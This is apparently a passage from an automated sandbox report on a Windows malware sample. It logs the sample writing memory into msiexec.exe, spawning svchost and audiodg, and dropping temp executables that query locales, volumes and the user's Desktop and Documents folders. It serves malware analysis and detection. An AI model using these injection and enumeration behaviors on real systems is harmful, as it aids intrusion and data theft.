                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF65D6F1000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF65D6F5000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF65D6F8000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF65D6F9000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF65D6FA000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF65D6FB000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeMemory written: C:\Windows\System32\msiexec.exe base: 7CF525A010Jump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeProcess created: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
                    Source: explorer.exe, 00000007.00000002.2538734983.0000000004460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1284826626.0000000004460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1282086763.0000000001081000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                    Source: explorer.exe, 00000007.00000000.1282086763.0000000001081000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.2535319742.0000000001081000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                    Source: explorer.exe, 00000007.00000000.1282086763.0000000001081000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.2535319742.0000000001081000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Manager
                    Source: explorer.exe, 00000007.00000000.1280650540.0000000000889000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2533196106.0000000000889000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman
                    Source: explorer.exe, 00000007.00000000.1282086763.0000000001081000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.2535319742.0000000001081000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF3E6FC cpuid 7_2_0DF3E6FC
                    Source: C:\Windows\explorer.exeCode function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,GetLocaleInfoEx,7_2_0DF3DC48
                    Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,7_2_0DF446A4
                    Source: C:\Windows\explorer.exeCode function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,7_2_0DF479D4
                    Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,7_2_0DF478D0
                    Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,7_2_0DF4781C
                    Source: C:\Windows\explorer.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,7_2_0DF44800
                    Source: C:\Windows\explorer.exeCode function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_getptd,GetLocaleInfoEx,7_2_0DF473B0
                    Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,7_2_0DF4F298
                    Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,7_2_0E0F46A4
                    Source: C:\Windows\explorer.exeCode function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,GetLocaleInfoEx,7_2_0E0EDC48
                    Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,7_2_0E0FF298
                    Source: C:\Windows\explorer.exeCode function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_getptd,GetLocaleInfoEx,7_2_0E0F73B0
                    Source: C:\Windows\explorer.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,7_2_0E0F4800
                    Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,7_2_0E0F781C
                    Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,7_2_0E0F78D0
                    Source: C:\Windows\explorer.exeCode function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,7_2_0E0F79D4
                    Source: C:\Windows\explorer.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,7_2_10214800
                    Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,7_2_1021781C
                    Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,7_2_102178D0
                    Source: C:\Windows\explorer.exeCode function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,7_2_102179D4
                    Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,7_2_1021F298
                    Source: C:\Windows\explorer.exeCode function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_getptd,GetLocaleInfoEx,7_2_102173B0
                    Source: C:\Windows\explorer.exeCode function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,GetLocaleInfoEx,7_2_1020DC48
                    Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,7_2_102146A4
                    Source: C:\Windows\explorer.exeCode function: __crtGetLocaleInfoA,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,_calloc_crt,free,_invoke_watson,7_2_08A1D57D
                    Source: C:\Windows\explorer.exeCode function: __crtGetLocaleInfoA,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,_calloc_crt,free,_invoke_watson,7_2_0AE4D57D
                    Source: C:\Windows\explorer.exeCode function: __crtGetLocaleInfoA,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,_calloc_crt,free,_invoke_watson,7_2_0B30D57D
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: EnterCriticalSection,EnumSystemLocalesW,LeaveCriticalSection,16_2_00007FF821D1D2E0
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: GetPrimaryLen,EnumSystemLocalesW,16_2_00007FF821D1F478
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: GetPrimaryLen,EnumSystemLocalesW,16_2_00007FF821D1F3C4
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: EnumSystemLocalesW,16_2_00007FF821D1F35C
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,16_2_00007FF821D1F8C0
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,16_2_00007FF821D1FA48
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: GetProcAddress,GetLocaleInfoW,16_2_00007FF821CCDC20
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\audiodg.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\audiodg.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\ucrtbase.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\_ctypes.pyd VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-console-l1-1-0.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-debug-l1-1-0.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-file-l1-1-0.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-file-l1-2-0.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-interlocked-l1-1-0.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-libraryloader-l1-1-0.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-memory-l1-1-0.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-namedpipe-l1-1-0.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-processthreads-l1-1-0.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-timezone-l1-1-0.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-util-l1-1-0.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-time-l1-1-0.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI5602 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\Desktop\EEGWXUHVUG VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\Desktop\EWZCVGNOWT VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\Desktop\QCFWYSKMHA VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
